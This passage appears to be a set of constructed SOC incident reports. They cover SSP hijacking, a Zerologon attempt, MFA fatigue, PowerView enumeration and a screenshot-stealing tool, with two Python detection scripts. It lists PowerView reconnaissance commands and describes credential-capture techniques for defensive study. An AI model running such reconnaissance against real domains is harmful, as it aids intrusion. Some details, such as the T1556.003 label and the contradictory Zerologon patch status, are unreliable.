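HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    Authentication Packages    REG_MULTI_SZ    msv1_0
    Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0winlogon
"""

# Constructed Security-log lines: time,event_id,field=value
SAMPLE_4622_EVENTS = """\
2024-02-22 16:10:02,4622,SecurityPackageName=Kerberos
2024-02-22 16:10:02,4622,SecurityPackageName=NTLM
2024-02-22 16:10:03,4622,SecurityPackageName=winlogon
2024-02-22 16:10:04,4624,LogonType=3
"""

MULTI_SZ_RE = re.compile(r"^\s*Security Packages\s+REG_MULTI_SZ\s+(.*)$", re.MULTILINE)


def parse_security_packages(reg_output: str) -> list[str]:
    """Return the entries of the Lsa 'Security Packages' value, in registry order."""
    m = MULTI_SZ_RE.search(reg_output)
    if not m:
        return []
    return [p for p in m.group(1).strip().split(r"\0") if p]


def unexpected_packages(reg_output: str, baseline=BASELINE_REG_PACKAGES) -> list[str]:
    """Registry entries that are not in the baseline (candidates for a rogue SSP)."""
    return [p for p in parse_security_packages(reg_output) if p.lower() not in baseline]


def unexpected_4622_loads(event_text: str, baseline=BASELINE_4622_NAMES) -> list[tuple[str, str]]:
    """(time, package) for 4622 events whose package name is outside the baseline."""
    hits = []
    for line in event_text.strip().splitlines():
        ts, event_id, field = line.split(",", 2)
        if event_id != "4622":
            continue
        name = field.split("=", 1)[1]
        if name.lower() not in baseline:
            hits.append((ts, name))
    return hits


if __name__ == "__main__":
    print("rogue entries in", LSA_KEY, "->", unexpected_packages(SAMPLE_REG_QUERY))
    print("unexpected 4622 loads ->", unexpected_4622_loads(SAMPLE_4622_EVENTS))
```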
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed malicious DLL loaded into LSASS |
| 2. Immediate Action | Isolate Domain Controller | CrowdStrike, Network ACLs | DC-01 quarantined |
| 3. DLL Removal | Remove malicious winlogon.dll | CrowdStrike Live Response | DLL deleted; restored from backup |
| 4. LSASS Restart | Reboot Domain Controller | PowerShell Restart-Computer | LSASS restarted; clean state |
| 5. Credential Reset | Force domain-wide password reset | AD, Azure AD | All domain passwords reset |
| 6. Investigation | Determine source of compromise | EDR, SIEM | Attacker compromised admin account |
Jira Incident Report
Ticket: SOC-2024-114
Summary: T1556 – Authentication Package Hijacking on Domain Controller
Status: RESOLVED
Resolution: MALICIOUS – Domain Controller Compromised, Cleaned
Priority: P1 – CRITICAL
Labels: T1556, modify-authentication, lsass, ssp-hijacking, crowdstrike
Components: Identity-Management, Domain-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Authentication DLL Injection – Potential Credential Theft”.
Host: DC-01 (Primary Domain Controller).
Process: lsass.exe with malicious winlogon.dll loaded.
Time: 2024-02-22 16:30 EST.
Technique: MITRE ATT&CK T1556.003 – Modify Authentication Process: Pluggable Authentication Modules.
2. Technical Analysis:
Attack Chain:
15:00 – Attacker compromises domain admin account via phishing
15:30 – Attacker logs into DC-01 using compromised credentials
15:45 – Attacker downloads malicious winlogon.dll
16:00 – Attacker replaces legitimate winlogon.dll with malicious version
16:05 – Attacker adds registry key for SSP (Security Support Provider)
16:10 – LSASS loads malicious DLL automatically
16:10-16:25 – Malicious DLL captures credentials from 78 logon attempts
16:25 – CrowdStrike detects anomaly
16:30 – Alert triggers
Malicious DLL Analysis:
File: winlogon.dll (SHA256: a1b2c3d4…)
Technique: Security Support Provider (SSP) hijacking
Function: Intercepts all authentication attempts (logons, password changes)
Capabilities:
Captures plaintext passwords
Logs to file: C:\Windows\Temp\~df78e.tmp
Exfiltrates every 5 minutes to 185.143.221[.]89:443
Credentials Compromised:
78 user logons captured (including 12 domain admins)
3 password changes captured (including 1 admin)
All captured credentials exfiltrated before detection
Attacker Access:
Full control of domain controller
All domain credentials potentially compromised
3. Investigation Findings:
Timeline:
15:00 – Admin account compromised
15:30-16:10 – SSP installed
16:10-16:25 – Credential capture
16:25 – Detection
16:30 – Alert
16:32 – DC isolated
16:35 – DLL removed
16:45 – DC rebooted
17:00 – Domain-wide password reset initiated
Indicators of Compromise (IoCs):
Files:
– C:\Windows\System32\winlogon.dll (SHA256: a1b2c3d4…)
– C:\Windows\Temp\~df78e.tmp (captured credentials)
Registry:
– HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages (winlogon added)
Network:
– Exfiltration IP: 185.143.221[.]89:443
Accounts:
– Compromised admin account (disabled)
4. Containment Actions:
Immediate Actions:
Isolated DC-01 from network.
Removed malicious winlogon.dll.
Restored original DLL from backup.
Rebooted DC-01.
Removed registry SSP entry.
Domain-Wide Actions:
Forced password reset for ALL domain users (3,200+).
Reset krbtgt password (twice).
Reset all service account passwords.
Revoked all certificates.
Credential Monitoring:
Monitored for any suspicious logins using stolen credentials (none found).
Blocked exfiltration IP at firewall.
5. Root Cause Analysis:
Primary Cause: Domain admin account compromised via phishing.
Contributing Factors:
No MFA on admin accounts.
Admin allowed to log directly into DC (should be PAW).
No application control on DC.
6. Business Impact:
Operational Impact: Domain-wide password reset, 4 hours of disruption.
Security Impact: All domain credentials potentially compromised; full reset required.
Financial Impact: Significant (incident response, password reset costs).
7. Remediation & Prevention:
Completed Actions:
Malicious DLL removed.
DC cleaned.
All passwords reset.
Admin account secured.
Technical Controls Enhanced:
Enforced MFA for all admin accounts.
Implemented Privileged Access Workstations (PAWs).
Blocked direct admin logins to DCs.
Enabled application control on DCs (CrowdStrike Falcon Prevent).
Monitored LSASS for any unauthorized DLL loads.
8. Conclusion:
An attacker compromised a domain admin, installed a malicious SSP on the domain controller, and captured 78 user credentials before detection. CrowdStrike detected the anomalous DLL in LSASS, enabling rapid containment. All domain passwords were reset.
Closure Rationale: DC cleaned; all passwords reset; admin controls enhanced.
Analyst: [Walter White], SOC Analyst Date: 2024-02-22 18:00 EST
75. T1212 – Exploitation for Credential Access (Microsoft Defender for Identity Detection)
Microsoft Defender for Identity Alert Details
Alert ID: MDI-EXPLOIT-1212-7842
Alert Time: 2024-02-22 10:30:15 EST
Severity: CRITICAL (95/100)
Source: Microsoft Defender for Identity
Rule: “Suspicious Zerologon Attempt Detected (CVE-2020-1472)”
MITRE ATT&CK: T1212 – Exploitation for Credential Access
Alert Details:
Detection: Possible Zerologon exploit attempt against domain controller
Target: DC-02 (Secondary Domain Controller)
Time: 10:25 EST
Exploit Details:
Vulnerability: CVE-2020-1472 (Zerologon)
CVSS Score: 10.0 (Critical)
Affected Protocol: Netlogon (MS-NRPC)
Exploit Attempts: 2,500+ in 2 minutes
Netlogon Anomalies:
Multiple Netlogon requests with zeroed computer account credentials
Requests for computer account: DC-02$ (domain controller account)
Attempts to reset computer account password
Pattern matches Zerologon exploit (privilege escalation to domain admin)
Detection Logic:
2,500+ Netlogon requests in short time (anomalous)
All requests use zeroed credentials (exploit signature)
Targeting domain controller computer account
Attempts to change password without authentication
Additional Context:
Zerologon allows attacker to gain domain admin privileges
Exploit targets Netlogon protocol
Successful exploitation gives attacker control of domain
Patch available (August 2020) – host may be unpatched
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify MDI alert | Microsoft Defender for Identity | Confirmed Zerologon exploit attempts |
| 2. Immediate Action | Block attacker IP | Firewall, Network ACLs | Attacker IP 185.143.221[.]89 blocked |
| 3. Patch Verification | Check if DC-02 is patched | SCCM, Windows Update | DC-02 MISSING critical patch (CVE-2020-1472) |
| 4. Apply Patch | Deploy emergency patch | SCCM, Windows Update | Patch applied immediately |
| 5. Exploit Check | Verify if exploit succeeded | Event Logs, MDI | Exploit attempts detected; no success (patched) |
| 6. Threat Hunting | Check for similar attempts | MDI, Splunk | No other exploit attempts found |
Jira Incident Report
Ticket: SOC-2024-115
Summary: T1212 – Zerologon Exploit Attempt Against Unpatched Domain Controller
Status: RESOLVED
Resolution: MALICIOUS – Exploit Blocked, Patch Applied
Priority: P1 – CRITICAL
Labels: T1212, exploitation, credential-access, zerologon, mdi, cve-2020-1472
Components: Vulnerability-Management, Domain-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Identity.
Alert: “Suspicious Zerologon Attempt Detected (CVE-2020-1472)”.
Target: DC-02 (Secondary Domain Controller).
Attacker IP: 185.143.221[.]89.
Time: 2024-02-22 10:30 EST.
Technique: MITRE ATT&CK T1212 – Exploitation for Credential Access.
2. Technical Analysis:
Exploit Details:
Vulnerability: CVE-2020-1472 (Zerologon)
CVSS: 10.0 (Critical)
Affected: Netlogon protocol (MS-NRPC)
Impact: Attacker can become domain admin without credentials
Attack Attempt:
10:25-10:27 – 2,500+ Netlogon requests from 185.143.221[.]89
Requests targeted DC-02$ computer account
All requests used zeroed credentials (exploit signature)
Attempts to reset computer account password
Pattern: Standard Zerologon exploitation
System Status:
DC-02 was MISSING patch KB4565349 (August 2020)
Vulnerability present for 3.5 years
Exploit would have succeeded if not detected
Exploit Success Criteria:
Attacker needs to send 2,500+ requests (probability of success increases)
After ~2,500 attempts, password reset succeeds
Attacker can then use computer account to authenticate as domain admin
3. Investigation Findings:
Timeline:
10:25 – Exploit attempts begin
10:27 – 2,500+ attempts completed
10:27 – MDI detects anomalous pattern
10:30 – Alert triggers
10:32 – SOC investigates
10:33 – Attacker IP blocked
10:35 – Patch verification (found missing)
10:40 – Emergency patch applied
10:45 – System rebooted
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 185.143.221[.]89
– Protocol: Netlogon (MS-NRPC)
– Pattern: 2,500+ requests with zeroed credentials
Vulnerability:
– CVE-2020-1472 (unpatched until 10:40)
4. Containment Actions:
Immediate Actions:
Blocked attacker IP at firewall.
Isolated DC-02 temporarily.
Verified exploit did not succeed (event logs).
Patch Remediation:
Applied KB4565349 (emergency patch).
Rebooted DC-02.
Verified patch installed.
Enterprise-Wide Actions:
Scanned all domain controllers for missing patch.
Found 2 additional DCs missing patch (applied).
Verified all domain controllers patched.
5. Root Cause Analysis:
Primary Cause: Missing critical security patch (3.5 years unpatched).
Contributing Factors:
Patch management failure (missed critical updates).
No vulnerability scanning for domain controllers.
No network segmentation limiting Netlogon access.
6. Business Impact:
Operational Impact: DC-02 offline for 30 minutes for patching.
Security Impact: Exploit detected and blocked before success.
Reputational Impact: Internal only.
7. Remediation & Prevention:
Completed Actions:
Patch applied.
Attacker blocked.
Other DCs verified.
Technical Controls Enhanced:
Implemented mandatory patch compliance for all DCs.
Deployed vulnerability scanning (Qualys) for all critical systems.
Enabled Netlogon security fixes (enforce secure RPC).
Created alert for any Zerologon attempt.
8. Conclusion:
An attacker attempted to exploit the ZéroLogon vulnerability against an unpatched domain controller. MDI detected the exploit pattern and triggered an alert. The attacker was blocked before the exploit could succeed, and the missing patch was applied.
Closure Rationale: Patch applied; exploit blocked; attacker IP blocked.
Analyst: [Walter White], SOC Analyst Date: 2024-02-22 11:30 EST
Batch 16: Discovery & Credential Access Incident Reports
76. T1621 – MFA Request Generation (Okta Detection)
Okta Alert Details
Alert ID: OKTA-MFA-BOMB-1621-7842
Alert Time: 2024-02-23 09:30:22 EST
Severity: HIGH (88/100)
Source: Okta Identity Cloud
Rule: “Multiple MFA Push Requests – Potential MFA Fatigue Attack”
MITRE ATT&CK: T1621 – Multi-Factor Authentication Request Generation
Alert Details:
Detection: User received multiple MFA push notifications in short time window
User: cjohnson@company.com (CEO)
Application: Okta Verify (MFA)
Time Window: 09:15 – 09:30 EST
Event Details:
09:15:32 – Login attempt from IP 45.134.225[.]78 (Russia)
09:15:33 – MFA push sent to user’s device (DENIED – user declined)
09:16:45 – Login attempt from IP 185.143.221[.]89 (Bulgaria)
09:16:46 – MFA push sent (DENIED – user declined)
09:18:12 – Login attempt from IP 194.165.16[.]89 (Romania)
09:18:13 – MFA push sent (DENIED)
09:20:05 – Login attempt from IP 45.134.225[.]78 (Russia)
09:20:06 – MFA push sent (DENIED)
… (continues every 2-3 minutes)
Total MFA Requests: 24 in 15 minutes
23 DENIED by user
1 APPROVED at 09:28:45 (user accepted after multiple requests)
Successful Login:
Time: 09:28:45
Source IP: 45.134.225[.]78 (Russia)
User Agent: Chrome 121 on Windows
Session Duration: 8 minutes (until detection)
Detection Logic:
24 MFA requests in 15 minutes (highly anomalous)
User normally receives 1-2 MFA requests per day
Multiple source IPs across different countries
Pattern matches “MFA fatigue” or “MFA bombing” attack
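The detection logic above as a runnable rule: a sliding 15-minute window per user counts push challenges, tracks distinct source IPs and countries, and flags an approval that follows a run of denials. This is an added example, not Okta's rule or the report's own code; the event layout, thresholds and sample events are constructed, and the 24 pushes of the incident are abbreviated to eight.

```python
"""MFA fatigue (T1621) detection over constructed Okta-style push events.

Implements the report's detection logic: a sliding 15-minute window counts
push challenges per user, tracks how many distinct source IPs and countries
issued them, and flags an APPROVED push that follows a run of denials.
The event format, thresholds and sample events are constructed for this
example; the real incident involved 24 pushes, abbreviated here to eight.
"""
from collections import deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=15)
MAX_PUSHES_PER_WINDOW = 5       # report: normal is 1-2 pushes per day
MIN_DENIALS_BEFORE_APPROVE = 3  # an approval after this many denials is suspect

# Constructed events: time,user,result,src_ip,country (deliberately unsorted)
SAMPLE_EVENTS = """\
2024-02-23T09:15:33,cjohnson,DENIED,45.134.225.78,RU
2024-02-23T09:16:46,cjohnson,DENIED,185.143.221.89,BG
2024-02-23T09:18:13,cjohnson,DENIED,194.165.16.89,RO
2024-02-23T09:20:06,cjohnson,DENIED,45.134.225.78,RU
2024-02-23T09:17:00,rpatel,APPROVED,10.20.30.40,US
2024-02-23T09:22:10,cjohnson,DENIED,185.143.221.89,BG
2024-02-23T09:24:40,cjohnson,DENIED,194.165.16.89,RO
2024-02-23T09:26:55,cjohnson,DENIED,45.134.225.78,RU
2024-02-23T09:28:45,cjohnson,APPROVED,45.134.225.78,RU
"""


def parse_events(text: str) -> list[dict]:
    """Parse the constructed CSV lines and return events sorted by time."""
    events = []
    for line in text.strip().splitlines():
        ts, user, result, ip, country = line.split(",")
        events.append({"time": datetime.fromisoformat(ts), "user": user,
                       "result": result, "ip": ip, "country": country})
    return sorted(events, key=lambda e: e["time"])


def detect_mfa_fatigue(events: list[dict]) -> list[dict]:
    """Return one alert per user whose push activity matches the fatigue pattern.

    An alert is raised when more than MAX_PUSHES_PER_WINDOW challenges fall
    inside WINDOW, or when an approval arrives after at least
    MIN_DENIALS_BEFORE_APPROVE denials inside the same window.
    """
    recent: dict[str, deque] = {}
    alerts: dict[str, dict] = {}
    for ev in events:
        q = recent.setdefault(ev["user"], deque())
        q.append(ev)
        while ev["time"] - q[0]["time"] > WINDOW:  # drop events older than the window
            q.popleft()
        denials = sum(1 for e in q if e["result"] == "DENIED")
        burst = len(q) > MAX_PUSHES_PER_WINDOW
        fatigue_approval = (ev["result"] == "APPROVED"
                            and denials >= MIN_DENIALS_BEFORE_APPROVE)
        if not (burst or fatigue_approval):
            continue
        alert = alerts.setdefault(ev["user"], {
            "user": ev["user"], "pushes": 0, "denials": 0,
            "ips": set(), "countries": set(), "approved_after_denials": None,
        })
        alert["pushes"] = max(alert["pushes"], len(q))
        alert["denials"] = max(alert["denials"], denials)
        alert["ips"].update(e["ip"] for e in q)
        alert["countries"].update(e["country"] for e in q)
        if fatigue_approval:
            alert["approved_after_denials"] = ev["time"]
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_mfa_fatigue(parse_events(SAMPLE_EVENTS)):
        print(f"{alert['user']}: {alert['pushes']} pushes, {alert['denials']} denials, "
              f"{len(alert['ips'])} IPs in {sorted(alert['countries'])}; "
              f"approval after denials at {alert['approved_after_denials']}")
```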
Additional Context:
CEO cjohnson is high-value target
User reported “annoying MFA notifications” at 09:20
User accidentally approved one request at 09:28
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Okta alert | Okta Admin Console | Confirmed MFA fatigue attack |
| 2. Immediate Action | Terminate active session | Okta Admin | Session terminated |
| 3. User Account | Temporarily disable account | Okta, Azure AD | Account disabled |
| 4. User Contact | Call CEO immediately | Phone | User confirmed accidental approval |
| 5. Password Reset | Force password reset | Okta, Azure AD | Password reset; MFA re-enrolled |
| 6. IP Blocking | Block attacker IPs | Okta, Firewall | All 3 IPs blocked |
Jira Incident Report
Ticket: SOC-2024-116
Summary: T1621 – MFA Fatigue Attack Compromises CEO Account
Status: RESOLVED
Resolution: MALICIOUS – Session Terminated
Priority: P1 – CRITICAL
Labels: T1621, mfa-fatigue, mfa-bombing, okta, executive-targeting
Components: Identity-Management, Executive-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Okta Identity Cloud.
Alert: “Multiple MFA Push Requests – Potential MFA Fatigue Attack”.
User: cjohnson@company.com (CEO).
Time: 2024-02-23 09:30 EST.
Technique: MITRE ATT&CK T1621 – Multi-Factor Authentication Request Generation.
2. Technical Analysis:
Attack Chain:
09:15 – Attacker obtains CEO’s password (via prior phishing)
09:15-09:28 – Attacker repeatedly attempts login with password
Each attempt triggers MFA push to CEO’s phone
09:15-09:27 – User declines 23 requests (annoyed)
09:28 – User accidentally approves request (MFA fatigue)
09:28-09:36 – Attacker has active session
09:30 – Okta detects anomalous pattern
Attacker IPs:
45.134.225[.]78 (Russia) – primary
185.143.221[.]89 (Bulgaria) – secondary
194.165.16[.]89 (Romania) – tertiary
Attacker Activity During Session (8 minutes):
Accessed email (Outlook Web Access)
Viewed 3 emails (board meeting minutes)
Attempted to reset passwords for 2 other executives (blocked – required additional auth)
Downloaded 1 attachment (financial summary)
No data exfiltration beyond attachment
User Behavior:
User reported “annoying notifications” to assistant
Accidentally approved while trying to dismiss
Did not realize approval was for attacker
3. Investigation Findings:
Timeline:
09:15-09:28 – MFA bombing
09:28 – Accidental approval
09:28-09:36 – Attacker access
09:30 – Alert triggers
09:32 – SOC investigates
09:34 – Session terminated
09:35 – Account disabled
09:36 – CEO contacted
Indicators of Compromise (IoCs):
Network:
– Attacker IPs: 45.134.225[.]78, 185.143.221[.]89, 194.165.16[.]89
Session:
– Okta session ID: 78a9b2c3-d4e5-f6a7-b8c9-d0e1f2a3b4c5 (terminated)
Data:
– Financial summary (attachment) potentially accessed
4. Containment Actions:
Immediate Actions:
Terminated active Okta session.
Disabled CEO account temporarily.
Reset CEO password.
Re-enrolled MFA (new device registration).
Blocked all 3 attacker IPs at Okta and firewall.
Data Protection:
Reviewed accessed emails and attachment.
Attachment contained non-public financial data (Q1 projections).
No evidence of further distribution.
User Education:
CEO briefed on MFA fatigue attacks.
Instructed to never approve unexpected MFA requests.
5. Root Cause Analysis:
Primary Cause: User fatigue led to accidental approval of malicious MFA request.
Contributing Factors:
Password compromised via prior phishing.
No number matching in MFA (just approve/deny).
No rate limiting on MFA requests.
6. Business Impact:
Operational Impact: CEO offline for 2 hours.
Data Exposure: Q1 financial projections viewed; not public.
Reputational Impact: Internal only.
7. Remediation & Prevention:
Completed Actions:
Session terminated.
Password reset.
MFA re-enrolled.
IPs blocked.
Technical Controls Enhanced:
Enabled number matching in Okta Verify (user must enter number from screen).
Implemented rate limiting for MFA requests (max 5 per 15 minutes).
Added alerting for excessive MFA denials.
Enforced Conditional Access policies requiring trusted locations for executives.
8. Conclusion:
An attacker used an MFA fatigue attack against the CEO, sending 24 push notifications until the user accidentally approved one. The attacker accessed email and viewed a financial document before detection. Okta’s anomaly detection triggered within minutes, terminating the session.
Closure Rationale: Session terminated; account secured; MFA number matching enabled.
Analyst: [Walter White], SOC Analyst Date: 2024-02-23 10:30 EST
77. T1087 – Account Discovery (Microsoft Defender for Identity Detection)
Microsoft Defender for Identity Alert Details
Alert ID: MDI-ACCT-DISCOVERY-1087-7842
Alert Time: 2024-02-23 14:15:33 EST
Severity: MEDIUM (72/100)
Source: Microsoft Defender for Identity
Rule: “Suspicious Account Enumeration via SAMR”
MITRE ATT&CK: T1087.002 – Account Discovery: Domain Account
Alert Details:
Detection: Multiple SAMR (Security Account Manager Remote) queries from single host
Source Host: ENG-WS-045 (Engineering Workstation)
User: rpatel@company.com (Raj Patel, Engineer)
Time: 14:10-14:15 EST
SAMR Queries:
14:10:15 – SamrEnumerateDomainsInSamServer (enumerate domains)
14:10:30 – SamrLookupDomainInSamServer (get domain SID)
14:10:45 – SamrOpenDomain (open domain handle)
14:11:00 – SamrEnumerateUsersInDomain (list all users) – 3,247 users enumerated
14:11:30 – SamrEnumerateGroupsInDomain (list all groups)
14:12:00 – SamrQueryInformationUser (detailed info for specific users)
14:12:30 – SamrQueryInformationGroup (detailed info for admin groups)
Targeted Accounts:
Domain Admins group – queried
Enterprise Admins group – queried
krbtgt account – queried
All users with “admin” in name – queried
Service accounts – queried
Detection Logic:
3,247 user accounts enumerated (high volume)
Process: powershell.exe (using ADSI or .NET)
Parent: cmd.exe launched by user rpatel
User normally does not perform account discovery
Pattern matches adversary reconnaissance
Additional Context:
User rpatel had previous security incidents
No legitimate business need for domain-wide enumeration
Queries performed via PowerShell (unusual for this user)
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify MDI alert | Microsoft Defender for Identity | Confirmed domain account enumeration |
| 2. Process Investigation | Identify PowerShell script | CrowdStrike Falcon | Found PowerView script (Active Directory reconnaissance tool) |
| 3. User Interview | Contact rpatel | Teams, Phone | User claims “researching security” – unauthorized |
| 4. Tool Removal | Delete PowerView script | CrowdStrike Live Response | Script removed from Downloads folder |
| 5. User Remediation | User counseling | Manager, HR | Policy violation documented |
| 6. Threat Hunting | Check for other enumeration | MDI, Splunk | No other hosts with same activity |
Jira Incident Report
Ticket: SOC-2024-117
Summary: T1087 – Domain Account Discovery via PowerView
Status: RESOLVED
Resolution: POLICY VIOLATION – Unauthorized Reconnaissance
Priority: P3 – LOW
Labels: T1087, account-discovery, powerview, mdi, policy-violation
Components: Identity-Monitoring, User-Behavior
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Identity.
Alert: “Suspicious Account Enumeration via SAMR”.
Source Host: ENG-WS-045 (Engineering Department, user rpatel).
Time: 2024-02-23 14:15 EST.
Technique: MITRE ATT&CK T1087.002 – Account Discovery: Domain Account.
2. Technical Analysis:
Enumeration Details:
Tool: PowerView.ps1 (Active Directory reconnaissance script)
Commands Executed:
Get-NetUser – enumerated all 3,247 domain users
Get-NetGroup – enumerated all domain groups
Get-NetGroupMember -GroupName “Domain Admins” – listed all domain admins
Get-NetUser -Username *admin* – searched for admin accounts
Get-NetComputer – listed all domain computers
Scope of Enumeration:
All domain users (3,247 accounts)
All domain groups (487 groups)
Domain Admins group (12 members)
Enterprise Admins group (5 members)
Service accounts (234 accounts)
Domain controllers (4)
File servers (23)
User Intent:
User claimed “researching security for a presentation”
No malicious intent identified
No data exfiltration
No unauthorized access attempted
Policy Violation:
No authorization for security testing
PowerView is penetration testing tool
Domain enumeration violates acceptable use policy
3. Investigation Findings:
Timeline:
14:10-14:15 – Enumeration performed
14:15 – MDI alert
14:17 – SOC investigates
14:20 – User contacted
14:25 – PowerView script identified and removed
14:30 – User interview complete
Indicators of Compromise (IoCs):
Files:
– C:\Users\rpatel\Downloads\PowerView.ps1 (SHA256: a1b2c3d4…)
Commands:
– Get-NetUser, Get-NetGroup, Get-NetGroupMember
Process:
– powershell.exe executing PowerView functions
4. Containment Actions:
Immediate Actions:
Removed PowerView script from Downloads folder.
Cleared PowerShell history.
No isolation needed (non-malicious activity).
User Remediation:
User counseled on policy violation.
Required to complete security awareness training.
Documentation sent to manager for review.
Monitoring:
Enhanced monitoring for this user’s account.
No further suspicious activity observed.
5. Root Cause Analysis:
Primary Cause: User downloaded and executed unauthorized reconnaissance tool.
Contributing Factors:
No application control blocking PowerView.
User unaware of policy against domain enumeration.
Curiosity about security without authorization.
6. Business Impact:
Operational Impact: None.
Data Exposure: None (information already accessible to user).
Policy Impact: Policy violation documented.
7. Remediation & Prevention:
Completed Actions:
Tool removed.
User educated.
Policy documented.
Technical Controls Enhanced:
Created alert for PowerView script execution.
Enhanced monitoring for SAMR enumeration.
Deployed application control to block unauthorized reconnaissance tools.
8. Conclusion:
An engineer downloaded and executed PowerView, performing extensive domain account discovery without authorization. MDI detected the anomalous SAMR queries, enabling identification and removal of the tool. The activity was a policy violation, not malicious.
Closure Rationale: Tool removed; user educated; policy violation documented.
Analyst: [Walter White], SOC Analyst Date: 2024-02-23 15:30 EST
78. T1010 – Application Window Discovery (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-APP-DISCOVERY-1010-7842
Alert Time: 2024-02-23 11:30:22 EST
Severity: MEDIUM (65/100)
Source: CrowdStrike Falcon EDR
Rule: “Suspicious Window Enumeration – Potential Credential Theft Prep”
MITRE ATT&CK: T1010 – Application Window Discovery
Alert Details:
Detection: Process enumerating open windows/titles, potentially for credential theft
Host: FIN-WS-078 (Finance Workstation)
User: bturner (Brian Turner, Accountant)
Time: 11:25 EST
Process Details:
Process: C:\Temp\windows_enum.exe (PID: 4789)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Parent: explorer.exe
User: bturner (standard user)
API Calls:
EnumWindows (enumerate all top-level windows) – 47 windows found
GetWindowText (get titles of each window) – 47 calls
GetWindowThreadProcessId (get process ID for each window)
FindWindow (search for specific window titles)
Windows/Titles Enumerated:
“QuickBooks Enterprise” – accounting software
“Microsoft Excel – Q1_Financials.xlsx” – spreadsheet
“Internet Explorer – Online Banking” – banking portal
“Outlook – Invoice” – email
“Remote Desktop Connection” – RDP session
42 additional window titles
Detection Logic:
Process enumerating all open windows (unusual for legitimate software)
Looking for financial/banking applications (targeted)
Parent process from Temp folder (suspicious)
Pattern matches credential-theft preparation (window-title targeting as used by screen-capture and form-grabbing malware)
Additional Context:
User bturner handles financial data
Process downloaded 5 minutes prior
Similar tools used for “form grabbing” attacks
SOC Investigation Process
| Step | Action | Tools Used | Findings |
| --- | --- | --- | --- |
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed window enumeration tool |
| 2. Process Analysis | Analyze windows_enum.exe | CrowdStrike Sandbox | Tool captures screenshots of financial applications |
| 3. Immediate Action | Terminate process | CrowdStrike | Process killed |
| 4. File Deletion | Delete windows_enum.exe | CrowdStrike Live Response | File removed |
| 5. User Interview | Contact bturner | Teams, Phone | User downloaded “productivity tool” from email |
| 6. Email Investigation | Find source email | Proofpoint, Exchange | Email quarantined; sender blocked |
Jira Incident Report
Ticket: SOC-2024-118
Summary: T1010 – Application Window Discovery Tool Targeting Financial Data
Status: RESOLVED
Resolution: MALICIOUS – Tool Removed
Priority: P2 – MEDIUM
Labels: T1010, app-discovery, window-enumeration, credential-theft, crowdstrike
Components: Endpoint-Security, Data-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Suspicious Window Enumeration – Potential Credential Theft Prep”.
Host: FIN-WS-078 (Finance Department, user bturner).
Process: C:\Temp\windows_enum.exe.
Time: 2024-02-23 11:30 EST.
Technique: MITRE ATT&CK T1010 – Application Window Discovery.
2. Technical Analysis:
Attack Chain:
11:15 – User receives email from “productivity@tools[.]net”
11:16 – Email contains link to “Window Manager Pro”
11:17 – User downloads windows_enum.exe
11:18 – User executes file
11:19-11:24 – Tool enumerates windows, captures screenshots
11:25 – CrowdStrike detects
11:26 – SOC investigates
Tool Analysis:
Name: windows_enum.exe (masquerading as productivity tool)
SHA256: a1b2c3d4…
Capabilities:
Enumerates all open windows
Captures screenshots of financial applications
Logs window titles and process IDs to file
Attempts to send data to C2 (blocked)
Windows/Titles of Interest:
QuickBooks Enterprise (accounting data)
Excel with Q1_Financials.xlsx (financial data)
Internet Explorer – Online Banking (banking credentials)
Remote Desktop Connection (potential lateral movement)
Data Captured:
47 window titles logged
3 screenshots captured (QuickBooks, Excel, Banking)
No exfiltration before detection (C2 blocked)
3. Investigation Findings:
Timeline:
11:15 – Email received
11:17 – Tool downloaded
11:18 – Tool executed
11:19-11:24 – Enumeration
11:25 – Alert triggers
11:26 – Process terminated
11:27 – File deleted
Indicators of Compromise (IoCs):
Files:
– C:\Temp\windows_enum.exe (SHA256: a1b2c3d4…)
– C:\Temp\~windows.log (enumeration log)
– C:\Temp\~screenshot*.png (3 screenshots)
Network:
– C2 attempt (blocked)
Email:
– Sender: productivity@tools[.]net
– Subject: “Increase Your Productivity with Window Manager Pro”
4. Containment Actions:
Immediate Actions:
Terminated windows_enum.exe.
Deleted executable and generated files.
Isolated host temporarily.
Blocked sender domain at email gateway.
Data Review:
Reviewed captured data (no sensitive customer info).
Verified no exfiltration occurred.
User Remediation:
User counseled on downloading untrusted software.
Password reset as precaution.
5. Root Cause Analysis:
Primary Cause: User downloaded and executed untrusted “productivity tool”.
Contributing Factors:
No application control blocking unknown executables.
User unaware of credential theft risks.
Email filtering allowed malicious link.
6. Business Impact:
Operational Impact: Finance user offline for 1 hour.
Data Exposure: 3 screenshots of financial data captured but not exfiltrated.
7. Remediation & Prevention:
Completed Actions:
Malicious tool removed.
User educated.
Email blocked.
Technical Controls Enhanced:
Implemented application control (CrowdStrike Falcon Prevent).
Created alert for window enumeration API calls.
Enhanced email filtering for productivity tool lures.
8. Conclusion:
A user downloaded a malicious tool masquerading as a productivity application. The tool enumerated open windows and captured screenshots of financial data. CrowdStrike detected the suspicious behavior and terminated the process before exfiltration.
Closure Rationale: Malicious tool removed; data contained; user educated.
Analyst: [Walter White], SOC Analyst Date: 2024-02-23 12:30 EST
79. T1217 – Browser Bookmark Discovery (Microsoft Defender Detection)
Microsoft Defender Alert Details
